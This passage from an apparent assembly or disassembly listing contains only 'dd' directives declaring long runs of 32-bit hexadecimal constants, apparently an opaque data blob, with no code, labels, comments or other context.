		dd 0F2F58A36h, 0C51956F9h, 0D479C099h, 1FEE89A0h, 5C4DD84Ch
		dd 0FE1F4F15h, 0BFDDCFCFh, 0E22C82B2h, 0D0C16A5Eh, 28432627h
		dd 0FDA84652h, 0D8981ED3h, 494DA28h, 955B305h, 99154D92h
		dd 916965A1h, 1E547717h, 55EC915Fh, 9324E645h, 0F8E8C22Fh
		dd 7B325D21h, 3142EAF0h, 798632BBh, 0BA927C56h,	654D475Ah
		dd 6218A92Bh, 0AFA0D786h, 0DCC2578Ah, 0C607F6B1h, 2A5FFE72h
		dd 1C15F6C6h, 8B46E8EDh, 0C13E3630h, 2648815Fh,	0DF82631Bh
		dd 70DD6E12h, 458DB7CDh, 155BB8BAh, 0AB0547AAh,	2AFE45A8h
		dd 5E7EE67Dh, 0ED6D2F87h, 58FF652Ah, 0D291FB60h, 0C86125B5h
		dd 82630800h, 0DC94015h, 0DF7E6F11h, 114931D1h,	9D5A3FD4h
		dd 3ECAFD7h, 69B5A0F3h,	0AA15B029h, 0D0B19007h,	0AE54A9Bh
		dd 4B66802h, 957656ACh,	81CD042Ch, 0D0682048h, 0D6C2A2BEh
		dd 0A454256Dh, 0C357498Bh, 0AC253134h, 0A256001Ch, 6AD6040h
		dd 8B2A840Ah, 3715B102h, 6F2882EEh, 0E74A22E0h,	14796D7Ah
		dd 84B985D0h, 0C4B408D7h, 857888D7h, 73480898h,	0C200A381h
		dd 88908990h, 1189D6C3h, 11B140E6h, 38152667h, 3888806Ch
		dd 0C050805Ch, 5C6A3995h, 99ACA30h, 0E30311B3h,	1B40C46Ch
		dd 46D24601h, 11B59984h, 0C46D2662h, 45E10998h,	65F1630Ch
		dd 67010D82h, 99C40DA2h, 266C1B70h, 99B46DEh, 3C5B11B8h
		dd 6A4C4466h, 5E2400C7h, 7A01FFEEh, 81D45026h, 630504CAh
		dd 18BE609Ch, 4B1B997Dh, 0B6354F5Ch, 84CC6434h,	6D440451h
		dd 28442FFDh, 89549C3Fh, 5262F15Fh, 759D37F9h, 0A2F63BC7h
		dd 0C529F89Ah, 0BA4F7A7Fh, 83EBF0A3h, 0F143740Fh, 0A3DB8994h
		dd 97EF5FA8h, 4A733EDh,	8803077h, 0F7C7C60Ch, 0D99F11C1h
		dd 95B9617Fh, 5FA61C99h, 0A8D72C8h, 3590A2F3h, 23D7803Eh
		dd 0FBA0FAB5h, 0B31308E0h, 0F6FCD33Eh, 80D0A42Fh, 783EE09Dh
		dd 4F6CE440h, 0F5E868C1h, 5AD2217h, 0ADB2FA7Dh,	71F57110h
		dd 679E707Ch, 9072E350h, 9FF307C3h, 0E6587E89h,	0B62E604Fh
		dd 97E42E18h, 103E8A67h, 0AC551A62h, 0BD507C4Fh, 0B2D9A108h
		dd 66CC150Ch, 334A8719h, 68C64B45h, 3746C3D7h, 0E38C243Eh
		dd 1A413B68h, 68C02B4Eh, 0E2D84644h, 700B1EFAh,	4FFB603h
		dd 0C9896E89h, 634689Fh, 0BB14D172h, 0C2599CB8h, 8B126707h
		dd 0FA7A8E11h, 595612F2h, 75B6225Dh, 33F928CFh,	47C23279h
		dd 21D0F07Dh, 11C1301Dh, 18E9BE53h, 0E593E4Bh, 92CFEB03h
		dd 0E18BF88h, 3C2A18CCh, 58D0E832h, 0A91F2500h,	0C9B0267Fh
		dd 633CA288h, 6A2564D9h, 4118130Ch, 5FA5150h, 85CF9A29h
		dd 0A4DF65EBh, 2903CCFAh, 0FF65ACEAh, 5FC7F944h, 0C631669Ch
		dd 0FC01E682h, 0D2303C31h, 5422D72Eh, 269AC5B6h, 35CF7BC6h
		dd 0A6207C6h, 0A82E30E1h, 82684444h, 9182C440h,	7F16E1FBh
		dd 0B47EBD12h, 0B3DE2193h, 364766B8h, 903C88F7h, 43F3666h
		dd 36F0CAD1h, 0B120F362h, 5D16C798h, 43124CD5h,	17A6302Eh
		dd 85544318h, 0D119495Ch, 0EBEC0373h, 0D8BCEEC8h, 5831B705h
		dd 9A40BA4Ch, 0FDC42657h, 67B5FE4h, 5282CC58h, 39064C53h
		dd 0B0D7BCA0h, 53A08F44h, 3D50AF40h, 4FEB6416h,	31093FDCh
		dd 8C3001BEh, 4E2C5D18h, 10BB6D33h, 0D295A765h,	63BC4BECh
		dd 72939444h, 2FEEFC34h, 0D19C3FB4h, 3890D238h,	8434C450h
		dd 47DD3F48h, 668176CCh, 59A3960Ah, 0ECF6668Eh,	9686B53Eh
		dd 29C04C6Ch, 7DA98EC6h, 8D1ECCD9h, 220D8DF0h, 0C65C558Ch
		dd 0A5B61BA2h, 0CD1DD1DBh, 7D8981Ah, 3192A96Ch,	0FFD63880h
		dd 205F6CE6h, 0F34661Ah, 0C2B1F0D2h, 0D9A476CDh, 9593A6DFh
		dd 0BA549AC0h, 954012A0h, 0B1C02B8Ah, 57F8082Ch, 70FC818Ch
		dd 0D408F43Dh, 613D5A84h, 0ECB4D944h, 4C9865ECh, 31CAB319h
		dd 42583300h, 9FB632C6h, 57CFF0B4h, 75D88DC6h, 34B9380Ah
		dd 0F234E11Ah, 0D427B2CDh, 0CFF3D18Ch, 7E58F83Bh, 0ED1AB450h
		dd 0DF5DE1BFh, 693277ECh, 0E6B1A304h, 0CB2368C0h, 12C250C2h
		dd 8D13691Ah, 0EA93ED58h, 50D83192h, 8C69CCD2h,	0EBC4944Dh
		dd 4BF1A304h, 9268FE65h, 0E948FEh, 0B81DDC82h, 0F68CF626h
		dd 0F840C44h, 0D1854C34h, 9A546B9Ch, 89552848h,	24D184A5h
		dd 6C3412A8h, 96CC7334h, 172260A4h, 35418F8Dh, 0A2F4AA48h
		dd 9A28A221h, 68D492E3h, 0E56360ACh, 1533657Ah,	2B1D32ADh
		dd 62C46CCh, 5E88A629h
		dd 1A302901h, 0F6F41CC7h, 0E0020A9Ah, 0EB130A34h, 9A30C7A7h
		dd 5313BE6Eh, 9B84A909h, 3908BA69h, 0F36CDE2h, 68D919C8h
		dd 1A325BF5h, 0B5E819D7h, 44672F57h, 0B04F9465h, 0DE2858FCh
		dd 4CC433B2h, 68B1C348h, 0A3CDF9F3h, 591AAE0Ch,	5204165Bh
		dd 0FD721745h, 831A0E44h, 2EC6E9B2h, 0C0C765Ah,	21865CEh
		dd 0ACB79700h, 8C00E121h, 0B4D49136h, 0AFDA29F5h, 74917603h
		dd 2D4267D3h, 5F4DF3BCh, 0F6D1CC69h, 8CD8AD9Bh,	7C0283A2h
		dd 56CCD115h, 1501B42h,	54D64A94h, 8911B234h, 95B84ADh
		dd 992C452Dh, 264A1222h, 5C554682h, 990D1372h, 0AD2C1A58h
		dd 234CFCA2h, 88D3469Ah, 226D11A7h, 8626846Ah, 0A025084Ch
		dd 2409114Ch, 80910447h, 0A548174Ah, 3E41248Bh,	99245C9h
		dd 35513FA9h, 0BF447DC2h, 52133B1Dh, 0D544A823h, 0BDFFA308h
		dd 0FDE42386h, 9511A452h, 99C84A80h, 27D33BCAh,	297C4CE6h
		dd 0DCC408FAh, 266DD2A3h, 59137EB0h, 45FE9A8h, 96462616h
		dd 0CD152C08h, 0C8232C82h, 8B1A29B7h, 63EBB29Dh, 7D6253ABh
		dd 2B1512ECh, 0D8D151B1h, 0B0D0E542h, 938EB4C0h, 0AE2BBCA7h
		dd 361E3DB7h, 0C7D18BCAh, 4469CC0Bh, 899295BFh,	0E4E80927h
		dd 0F295074Bh, 43AEB47Eh, 4C6501EAh, 9322D212h,	0C69048C4h
		dd 0E9A413B4h, 865031B0h, 12522D02h, 0BE06C5F3h, 2A0CA0AFh
		dd 94D39385h, 82949E34h, 0FEB44469h, 4C3F317h, 84C38DD1h
		dd 11C84993h, 0C4A7094Fh, 4E54C253h, 26D20929h,	2124008Dh
		dd 0D262338Dh, 0F348A7A4h, 3348348Ch, 143B6349h, 1A53CF57h
		dd 0A6248691h, 9485FC46h, 1A4CA526h, 0BFC8D11Ch, 8D953230h
		dd 6855B5B4h, 0A8080462h, 54940D7Ch, 0E279A606h, 0D227E129h
		dd 2A29A04Ch, 0A3DAD32Bh, 0B4267EF5h, 6A53447Eh, 0CD326E72h
		dd 0F9689348h, 48FAD322h, 537344B6h, 0ED827514h, 3390D647h
		dd 46B866D1h, 46E499CCh, 133D2174h, 0FE1E2673h,	0C84C1EAFh
		dd 7A313C89h, 3566E626h, 5F6340B9h, 229E360Ah, 6911E9DDh
		dd 9A69D5F6h, 76E6E56Ah, 1E2913A6h, 8960CB65h, 0A436A46Ch
		dd 69195171h, 0D1C4692Eh, 99A4A408h, 6C694C04h,	0D26E9A4h
		dd 0A4010325h, 1A4634B1h, 58B0639Bh, 3495C8C2h,	18A274A2h
		dd 86284713h, 0C5124EBAh, 0D505D254h, 0A0623495h, 22B1CBCCh
		dd 75404176h, 564AE528h, 19372138h, 78570E0Bh, 0E8316132h
		dd 0FBAF33h, 4005C777h,	41F4ACD0h, 2222BE04h, 0E28205AFh
		dd 0B5038B85h, 8D3A18FCh, 8B1177E3h, 0C4B2CCE4h, 0D8D3E350h
		dd 6DF8B0D9h, 69CEB8C7h, 0F7C063ACh, 967E9C1Eh,	4DA799F5h
		dd 0C0EF8EC3h, 726FDD8Fh, 0E91AFB77h, 0A123661Ah, 0B3D41486h
		dd 0D791E2FEh, 8C4298C1h, 0CE07B4F2h, 0F4600786h, 2C27F089h
		dd 0C69D3746h, 0A5CC7CB8h, 2DF4B3E2h, 9A6FFCB2h, 8E1B3CCh
		dd 232D11FBh, 0E31C3A8Bh, 6470BC87h, 13F22799h,	60EEB0E8h
		dd 660EED68h, 2EDE591Fh, 0FB404592h, 6A095651h,	9D4499A4h
		dd 17C4BA09h, 66916BC2h, 0A1916D02h, 0CD223220h, 32A8DA04h
		dd 4CA86441h, 0D7E48D14h, 4C8A26E4h, 469D8D54h,	5C6AC0D3h
		dd 8D5E6A1h, 16A10923h,	0A826444Ch, 935A8A1h, 50C69F3h
		dd 9921092h, 82C98F24h,	444544C8h, 58C8C2D1h, 6722AEEAh
		dd 49AF0DC1h, 3032A662h, 0C3342EE9h, 53110A20h,	0BEE4171Fh
		dd 0D3181471h, 3CC41E0Eh, 949F072Ah, 450CA0A1h,	0CB105673h
		dd 17F5843Eh, 1FFAB2E1h, 2D103611h, 0C659B145h,	0F57D0140h
		dd 78BBFADEh, 0EE4C5076h, 58CBB0D1h, 4ACD383Eh,	0FAC547D3h
		dd 695D535h, 6B09E513h,	989F41A8h, 3094A07Fh, 4EFBC943h
		dd 3F34252Ch, 2F9E2989h, 0C5B6ACA9h, 0C266269Ch, 8571CD4Ah
		dd 0F04FFAC4h, 0E03512C7h, 3AB8CBC6h, 0B47F96DBh, 16698A6Fh
		dd 4AECD691h, 71334F1Ah, 4D11C266h, 9CE02098h, 0D0F5CE21h
		dd 432B5B84h, 739C9C69h, 54528CCAh, 71927E18h, 0C7B61997h
		dd 0F05F1B30h, 0C36E0539h, 0D9460790h, 0A7143050h, 626495DFh
		dd 0A63F946Ah, 46265EB4h, 0FFB4F950h, 0AF848984h, 88D1BF34h
		dd 509991A3h, 0AC2684FAh, 0AE292C4Ch, 40484812h, 48B8FADh
		dd 3ED29252h, 5569BFF3h, 3FA58596h, 0F4C687D5h,	6F8D0A63h
		dd 52E236E3h, 6625170Eh, 469CB4Eh, 0C4D00893h, 7A51C317h
		dd 532DA747h, 0A6444AAh, 0C456942h, 24427A1h, 42662D29h
		dd 9CE193CDh, 50C4B13Eh, 8ECA9143h, 0A6487B58h,	0BA9B6CECh
		dd 93A4DC0Dh, 8BA37629h, 9951E79Ah, 1ABD0812h, 8A65A437h
		dd 2DCEB56Dh, 12AEB05Eh, 7625BE56h, 9E6D3C08h, 8D2BE6F5h
		dd 1294916Eh, 84AB0957h, 130F2295h, 3579894Ah, 0B72232Eh
		dd 1A884069h, 0CE277459h, 1A889919h, 0A0B4F521h, 85918987h
		dd 0A2359534h, 9826C46Ah, 9426413Eh, 9623134Ch,	0A3894612h
		dd 9E399384h, 1A494612h, 6999D6C1h, 0A40D6587h,	0BADB2455h
		dd 0CA9B2021h, 0CD254692h, 0AE4C66ABh, 0A0694E7Fh, 0E9D21140h
		dd 9D008FDh, 0CFFC01C7h, 0C562AF29h, 251C68FAh,	0D9B9528Ch
		dd 24DF52E9h, 0F4D3D714h, 0D3A9267Ch, 0B85F38A5h, 0D9FB8045h
		dd 968C8C63h, 5F6A284Ch, 0CA5D4A7Eh, 1EE12C1Dh,	0FB503C7Dh
		dd 780BD091h, 0A99E99ACh, 4BA579EFh, 9AC4F991h,	14ED3509h
		dd 0B130CF81h, 0D1264266h, 0E8451796h, 9B93941Bh, 4A381A70h
		dd 46FDC38Fh, 4046D283h, 627289FDh, 2E3D9E22h, 4A0D2F4Ah
		dd 0A70925A3h, 0CF81484Fh, 1CDA93C4h, 0CD2817A5h, 8ECB3138h
		dd 91C673D2h, 9AE0A2D2h, 8C2D943Ch, 0D75AD156h,	1490D8B4h
		dd 37888C49h, 8452667h,	0A7A59185h, 0F15B9452h,	676D1BFBh
		dd 0CF2AB1ECh, 309AE947h, 93E86621h, 8ACE8487h,	0D6ECB229h
		dd 99C23C4h, 5C325F2Bh,	4FAA536Ah, 2BB58452h, 0B923EB76h
		dd 914E6112h, 4211EFC0h, 65152E1Dh, 1521F1E0h, 671A08CFh
		dd 9896C8h, 0F08A4653h,	9A64D33h, 0BD316013h, 228A7E08h
		dd 429AB9FCh, 48BEA4FEh, 0CA2247A6h, 8A2DD404h,	9AA467E0h
		dd 8BE4FC22h, 9B67DF92h, 0E848DFE2h, 531FBF09h,	0BD6A8964h
		dd 0CA121D4Fh, 2C695A4Fh, 649F9F4Eh, 99C7A6B1h,	7C4452F0h
		dd 0D3F3C4A1h, 0D65B6C5h, 0BE2203DFh, 5284927Eh, 0C15B9C7Eh
		dd 0ED843E3h, 1D958A85h, 69219561h, 86938404h, 14ECB109h
		dd 31322110h, 2F44266h,	6A0D10F5h, 905E3115h, 0A909A534h
		dd 0C842917Dh, 4D5A94C4h, 45F2390Ch, 4DB47511h,	0F42D7539h
		dd 0A2993404h, 7DEB02BDh, 26711B2Ah, 16814CE0h,	0C99113EAh
		dd 0C8D314C7h, 16E4EE22h, 0B631E601h, 285EF454h, 0A5DB4241h
		dd 5127591h, 0C8D3009Ch, 0EBC23CAAh, 0C1CB9CA8h, 2F623BE3h
		dd 0B6C88A86h, 483A55A7h, 0F1296B16h, 784AF095h, 81EA0229h
		dd 48ABF894h, 69A405E2h, 8EE650F5h, 8BB58B78h, 0A89942C2h
		dd 9234132h, 0A9A32047h, 0BEA3ED3Ch, 188FA93Ch,	9C14B68Fh
		dd 0AB4F85A0h, 9B045327h, 7D44BEE9h, 991BCDA2h,	0B469F322h
		dd 108B623Dh, 0EA6319FBh, 33517322h, 0BE62B8D2h, 0C24B65A8h
		dd 19EE1383h, 0F6F0DB69h, 2A1C658Fh, 570B16AFh,	6D142E62h
		dd 809906C8h, 982226BBh, 0CE22C44Ch, 31EA9C04h,	1C4564C1h
		dd 0B11E4E9Ah, 92C551FBh, 0C96EA4F4h, 0AC2311DCh, 0C9825176h
		dd 913795C4h, 9EA4B3B5h, 7C714109h, 7415F5DAh, 0D699154Eh
		dd 0EA35155Bh, 1EDCD04Ch, 0FE8811E5h, 65618A64h, 99CEF751h
		dd 894DF2F0h, 1F5ECE29h, 0BB5E4125h, 8CD2B2B0h,	9F14112Fh
		dd 0D1F915A6h, 6544E777h
		dd 4AE6E0F7h, 98725DCCh, 0DB042ACBh, 650134F8h,	266DCDA2h
		dd 0F5114D8h, 11561328h, 0D349AF51h, 1DCCA45Fh,	176B3E41h
		dd 9132ACD5h, 17470265h, 5891808Eh, 8A63FCE8h, 2CDF5F3Fh
		dd 29A7CFCBh, 0EB535079h, 12F911C7h, 58B2208Bh,	0B0692E49h
		dd 0A5B0D85Dh, 0FD76F98Bh, 0E8CF7738h, 5D1E511Eh, 50DD1EA6h
		dd 51650E39h, 9EAD979h,	26555D2Ch, 82654EEAh, 6D3111CEh
		dd 6A834114h, 5511C698h, 7713D49Bh, 0B51D5EA5h,	4917494Fh
		dd 65B1CCBEh, 8E556B42h, 0A1E232A0h, 0A1EB1356h, 55BB1174h
		dd 9504917Bh, 77934FBCh, 999B74CDh, 6A82EF5Ah, 0DE9BF34Bh
		dd 1D4B68D2h, 6A5245BCh, 4BC78261h, 31BA1744h, 5BC1613Fh
		dd 29D300D6h, 92AEEBA2h, 1E723CF0h, 8A152A1Dh, 0C3B811B9h
		dd 7B657CBDh, 0C82661D9h, 0B03D0AB4h, 64451A4Ch, 2A4D4FBDh
		dd 0B4775A9Bh, 45D2593h, 9744333Eh, 3964AE09h, 8BD2CB02h
		dd 8A7547DAh, 693D45F2h, 535B4B86h, 9FD1165Dh, 7AA1017Ah
		dd 0E702EA2Ch, 7E50E2D0h, 0C81A71EAh, 0E9F4E598h, 0BD284ECCh
		dd 0E9C7A30Bh, 0FFAA0F54h, 7E1F8814h, 76DF807Ch, 77E18285h
		dd 5A8C20F1h, 6639BA72h, 0D4204400h, 704C5F88h,	3F1880ABh
		dd 0ABC08E18h, 88078BFh, 44ABB070h, 220F0A2h, 2530A815h
		dd 690D3C94h, 4C1ADC4h,	781D96A4h, 5138C519h, 46BA2680h
		dd 9E215199h, 0C2460038h, 20494048h, 514C50A2h,	193C2300h
		dd 70CCC0F1h, 0AB8347DAh, 0EAD85C2Eh, 4B87F0DFh, 5764DB8Bh
		dd 5D2ABA07h, 9F32FE86h, 134B07AAh, 0F983B8BAh,	78E3C52Bh
		dd 73CF53Bh, 0CE47FF25h, 6B8CE07h, 0A03AFE01h, 0F1E06A4h
		dd 0EB1D4616h, 3CA89E69h, 93C20817h, 9E29C480h,	619F0C7Eh
		dd 0C1C84B65h, 0D412A154h, 1FD8113Bh, 0E0FEBB8h, 5389615Eh
		dd 8EAC107h, 0C5B18D6Dh, 0AC012B6Eh, 5968BC23h,	0EE9DD041h
		dd 3DE10BC8h, 2F613A83h, 7FFC5AA4h, 0C7B0E885h,	7F9BBBCDh
		dd 174A1B70h, 93017E24h, 0E714A576h, 6B12A5E2h,	28E6E397h
		dd 0A13A0060h, 0F83E272Ah, 9A735EF7h, 5DEE2411h, 43AED708h
		dd 0CBE1A0FDh, 0F950726Dh, 463DD4Ah, 6193E48h, 17E94434h
		dd 8F06BE21h, 341186EBh, 0D12A0F3Ah, 973611D3h,	5B2E6C6Ch
		dd 1FA4264Ah, 25D2C40Eh, 582EEB15h, 53C033F9h, 0B8A5432Ch
		dd 0C09022DDh, 0A7897A75h, 0C9A6AFD6h, 0BB10C9A8h, 17CCCD10h
		dd 0F461CC5Fh, 62F97FA1h, 8BEBF4FBh, 598CDF7Eh,	13A64607h
		dd 5628E9A7h, 43CE94h, 4FD1C402h, 8243BC90h, 66280D88h
		dd 2E5B07Ch, 0D7AB4FF5h, 9BA8D2AFh, 50F5AFBDh, 0E3BEBD2h
		dd 8AB58331h, 0A2FE2811h, 0D77E5D92h, 4E4CAEF3h, 458A143Fh
		dd 527704C4h, 0C42E3AA6h, 0C360D1BBh, 0D8E95067h, 492E6DCh
		dd 22772865h, 81DAA70Ch, 0AF20DEEAh, 0B54955D9h, 435F750Ah
		dd 0A095D926h, 14887764h, 0A8B0FBD4h, 0F447C155h, 8EF4AF8h
		dd 0F4C9E0F5h, 0A33B9D8Ch, 1139A917h, 0D36EAB76h, 963E6878h
		dd 0E9A9C225h, 35698E96h, 5C664ECAh, 5E651161h,	6BBA171Ch
		dd 6272B494h, 6026450h,	27082F64h, 0ECE15556h, 0D918C228h
		dd 5C574AB3h, 0D1737665h, 0FEA6E8B6h, 7D98C335h, 0A55E5B01h
		dd 57EB3F20h, 0F264E90Bh, 5C180680h, 7E03B8AFh,	2BB7A1C8h
		dd 3175C3FEh, 36A7A2CBh, 0F42ED946h, 7712189Dh,	80E4E780h
		dd 0D4597A39h, 5C46C0B8h, 0AACB991Fh, 0F46CD8Bh, 7257307Ch
		dd 826C0236h, 3855E1FEh, 7059042Eh, 0F7840C40h,	5E65B12Eh
		dd 250A7F17h, 73B6180Bh, 0FF18BB32h, 31A08262h,	1C28DBACh
		dd 570FAAFBh, 0BE956649h, 425A48C2h, 8D9FDCC5h,	943F9570h
		dd 0BB956F82h, 1F2441C8h, 0D17E350h, 0AA0F3272h, 0D3C259C2h
		dd 1F4A57FAh, 4AEE62B8h, 0B257CDD2h, 0C0FF6324h, 0EC8CDFA9h
		dd 74C2C241h, 8DF80B90h, 96705FDh, 0B080AD6Dh, 0B070AE1Fh
		dd 93BC9585h, 455F9599h, 160AC675h, 44FC6164h, 57A2816Bh
		dd 4E3B8C3Dh, 0EE4203Bh, 1CC4F6B6h, 88011132h, 551D521Eh
		dd 72ACACC9h, 0B4EB2A8Ah, 0BFD2ED93h, 0A311968Ch, 70D7E4BAh
		dd 0B1600509h, 62B8AF3Eh, 46CC306Dh, 0E3747EBEh, 0AB017E3Dh
		dd 0B0CB354Ah, 0AEB2205Ch, 32524B11h, 74A2A554h, 481F28EBh
		dd 1D18AB1Ah, 3185C758h, 86034CC6h, 8C055CDBh, 0DBD16024h
		dd 0C6347451h, 0F8D1E627h, 5F18F597h, 2C0F4634h, 0EDE06D42h
		dd 0EB240C5Ch, 93EC46C6h, 28FE96C6h, 8A560FB2h,	92B98AFBh
		dd 0D7D61345h, 0CE26CF45h, 2F0D9D0h, 0E311EB84h, 30AE24A2h
		dd 0CC424C02h, 3CC51902h, 0AC5CFADCh, 30290C07h, 0A013010h
		dd 383254D8h, 5F21F3h, 0F63607AAh, 41775606h, 90CCA05h
		dd 0CC6D1276h, 0A86E6305h, 75F5823Eh, 646E536h,	7D68A136h
		dd 0B80A0511h, 74C29FABh, 2BEA9B09h, 0F7D8901Eh, 233355C3h
		dd 0F5BF6219h, 0DFA51015h, 0F888B5C5h, 7545372Ah, 74B4A4C1h
		dd 2AFEE463h, 2D366820h, 5F1930B1h, 0D38F026h, 2A23A258h
		dd 2FB8BE76h, 450A3A88h, 1254FFA5h, 0F5D28254h,	10EE0249h
		dd 0D4E2356h, 0E648242h, 0F5A65FEBh, 82AC12Bh, 564633F0h
		dd 59636037h, 8851C5E3h, 551645F5h, 79D9F5AAh, 8AA07E6h
		dd 2FAC98E2h, 0FB973A5Bh, 249942A2h, 8E1CC1FDh,	2919FC32h
		dd 2712FDB0h, 2719478Fh, 0D667478Ch, 0BB514E64h, 0ADC09731h
		dd 0AFAD4265h, 592446FDh, 8A8C7ADh, 0AC0BC41Bh,	0CBE3A32Fh
		dd 0A08C22A8h, 9C20295h, 0F7860A84h, 0CB9FEABBh, 188CC06Eh
		dd 18AACC63h, 0FA60E414h, 0A242E0FBh, 0C07DFCFEh, 9208204Ch
		dd 85F733C6h, 0AF4D6611h, 6613868h, 0F0EE3C04h,	2D18DE9Dh
		dd 0C4098658h, 2AEC5469h, 50389917h, 0A1805463h, 26DF7D82h
		dd 0F68BEEFDh, 0F1A5D4DBh, 0AA700924h, 6FACA274h, 934AE6Ah
		dd 0FCECD9E4h, 0E5A8AB2Eh, 8C28CCD7h, 50BD8D43h, 0A548E455h
		dd 855965FEh, 0F560430Ch, 8E212CFh, 86803417h, 0E0C0FBCFh
		dd 0E2FAB4C0h, 1C38CE09h, 0AA3609E3h, 2B8A4E6Eh, 654AECFDh
		dd 0A3CCA524h, 0C8222B8Bh, 894C4A90h, 0F85F68BAh, 221B670Bh
		dd 0EC9B795Dh, 7D12F2CFh, 7AAEA022h, 0E2CA6965h, 8FC58BCAh
		dd 68355F61h, 0D10559B9h, 438F15DEh, 0C54601D9h, 0F33F9560h
		dd 553334D8h, 99FCAF33h, 46F1FB55h, 0AD394613h,	7B6AEC05h
		dd 323454F8h, 8337C466h, 0A4A5D68Fh, 9204B55Dh,	3290BFA8h
		dd 0BABFD04Dh, 0B24F562Bh, 5E605AACh, 7999C101h, 5B1E8599h
		dd 897028ECh, 57DDCCBEh, 6A42C977h, 3DC0EDE3h, 28AAB9A6h
		dd 6CDE318h, 31C820A7h,	0D848ABD5h, 0E785677h, 2B1D1D08h
		dd 0A1A49F3Dh, 434706E2h, 4EE110Fh, 251B27BBh, 5DE4C13Ch
		dd 3BE08295h, 85F90F95h, 0AA54DCA0h, 48AD0FA5h,	422C58FDh
		dd 8D5D657Dh, 1EA27E91h, 9154A378h, 0EA34416Ah,	6735F54Bh
		dd 0FD0A990Ch, 1918C99Fh, 18C1BE22h, 17D6B541h,	0DC7F0FF0h
		dd 0D0DDECA5h, 0D1A4B41h, 0D6950D56h, 0B9028D0h, 687070BCh
		dd 13E6DD0Ch, 0ABE61F2h, 0B55092BCh, 1D065CD9h,	8822232Dh
		dd 1FA10ADEh, 0DDD9E717h, 0BD80EE5Eh, 0CA2F75A1h, 1FE621BFh
		dd 90D4905Ch, 0F9D81573h, 8E72A21h, 10DE4FA3h, 1802AE3Eh
		dd 0C3F644DCh, 67B25048h, 17E2144Eh, 0D22BCB42h, 0B2EFED7Eh
		dd 3F7D54C6h, 0F1184064h, 0C7D448Ah, 116ECABEh,	8A0A2B5Eh
		dd 0F6B3D19h, 2B3F7735h, 7F33E70Ch, 0D0D80C65h,	4842D380h
		dd 5A2EAE92h, 0FFBA96F2h, 7DB681EBh, 0C115C726h, 5ADB7B4Fh
		dd 0CF96D5A9h, 45E0F3F5h
		dd 0D89D22CBh, 0C1F71B6Ah, 0AB96A617h, 4EE86979h, 0E40D8574h
		dd 9811898Bh, 0EE3F494Dh, 98001FD9h, 87BB1013h,	43BE55A9h
		dd 346EAF24h, 0E8DA0880h, 0F8F9FC7h, 0D75287F6h, 33A80535h
		dd 4A84620h, 918B125Ch,	50B2850h, 0B8BE9204h, 2FADFDA1h
		dd 0B15D3856h, 0F8EA94B4h, 5A922BB3h, 7467DDC0h, 617CD301h
		dd 89309CCAh, 5027828Bh, 7CF4C4BBh, 64E26369h, 4441A39h
		dd 0F863B5B0h, 1C54E2BBh, 5374002h, 447D1A75h, 17DE6562h
		dd 5FDA6B11h, 0C95BA4DEh, 1C82862Ah, 0D30D39FAh, 7BFA9A5h
		dd 855DDE30h, 0C9306AA5h, 67365F58h, 313BBFF0h,	0EC8EBAD7h
		dd 0A9F7FDAFh, 4C29A1ABh, 9575AE0h, 908CF36Ch, 188275FDh
		dd 5FD1C6B1h, 2E91C10Ch, 0F7C02557h, 0CDDC3C6Dh, 0D7E4517Fh
		dd 78C6A362h, 9CC9413Dh, 0C6E5137Ah, 0A46AA101h, 0A516452Ah
		dd 35BFABFCh, 52AA7D91h, 0C28C0B1Dh, 0ADB89ED5h, 0E02A2A99h
		dd 1F5E9C43h, 9F870775h, 4DF2DDCAh, 1A43DB71h, 0FF2586C3h
		dd 218B99F8h, 0EA18D5FDh, 4010FCD4h, 0DEA79DEFh, 31487119h
		dd 0A7F1E943h, 1496340h, 40364AD1h, 0BC2D4AD1h,	0C7506C56h
		dd 69810529h, 4606B601h, 0E15AC2D0h, 0CEC1BEB4h, 80BDEDE5h
		dd 4A790EB0h, 9698185Ah, 0CEB28405h, 350F404h, 17539823h
		dd 1086855Bh, 0AB16372Dh, 0CB3BA72Dh, 5D2928D2h, 0B0E0F236h
		dd 3793733Fh, 34AF4311h, 0CBEB5EA0h, 3162ACE2h,	8D68384Ah
		dd 2F0FF40Fh, 0A9598835h, 94FB3308h, 0BAEDC0F1h, 31152131h
		dd 31A7D995h, 480ADEA3h, 72535756h, 6B4DB908h, 78103588h
		dd 19323016h, 0CB09F09Ah, 4516ECA2h, 7830D9D4h,	0A656F369h
		dd 752564Eh, 4050BA7h, 37A6FE80h, 0FE225BC4h, 0E32882BAh
		dd 0A0F35FD4h, 0A9A9F425h, 6410A9BBh, 0BB2A03F5h, 4358B91Bh
		dd 0B564390Dh, 0A8C9A44Eh, 94D3FD37h, 7A805CC6h, 0DDD82ECh
		dd 0C5EF285Eh, 4AC87114h, 50555A14h, 290386FEh,	4DE6B87Ah
		dd 3CC95FD1h, 8DB7E388h, 1F9B7EB3h, 1C867DDCh, 0FD805438h
		dd 57BA0B45h, 433D55D1h, 4DDFA17Fh, 0C5D2192Bh,	0ACF282C8h
		dd 2BB798B2h, 8BC62309h, 66EE295Eh, 6B932F6Fh, 65A5DCC8h
		dd 0CAC60158h, 1A480562h, 30BE8786h, 471841C2h,	2080F138h
		dd 9263D472h, 61ED985Fh, 0FCA15AD9h, 6AC6504Dh,	0AD95AB0Bh
		dd 17A8922Fh, 0C0838AAEh, 0DDD1C34Eh, 1EE3BCDDh, 86744633h
		dd 52B2C11Fh, 74186243h, 0BF36AF92h, 95023FD4h,	0AD18565Dh
		dd 3C14D98Ah, 8C5AB84Ah, 72380B77h, 0B3AB92C4h,	6B11C56Dh
		dd 29A1B2F6h, 231BDEBAh, 48121BFAh, 571AAA98h, 53C24A71h
		dd 3D5E8B88h, 1AA7313Fh, 33FBEDADh, 556A6633h, 0C65B0BA5h
		dd 80E5A938h, 0CD176788h, 0D0D550BAh, 607C2B98h, 606181F9h
		dd 7194EA19h, 66B4EFC2h, 6F279A9h, 42985214h, 5A3BDBF3h
		dd 0B43C99F9h, 0F2A8C501h, 20558F2Ch, 0A8880B4Ch, 0BFB3047Ah
		dd 58C1C5C0h, 0C829F780h, 559DDE94h, 3124059h, 8504A781h
		dd 16AB0238h, 0D670A519h, 0B40609E5h, 88C7363Fh, 42B012B8h
		dd 0EC8FBB31h, 0F61F1B2Fh, 986238C8h, 9F586C56h, 15ACF6ADh
		dd 4EA13E34h, 489DAC84h, 0A312CBEFh, 0D494E46h,	0C9684E6Eh
		dd 0D7FD5B11h, 30B0B030h, 9115EB96h, 9B605C5h, 2531E95Fh
		dd 0C6C28EFCh, 0C3E5B321h, 65B54159h, 94BA02A4h, 0C6594D3h
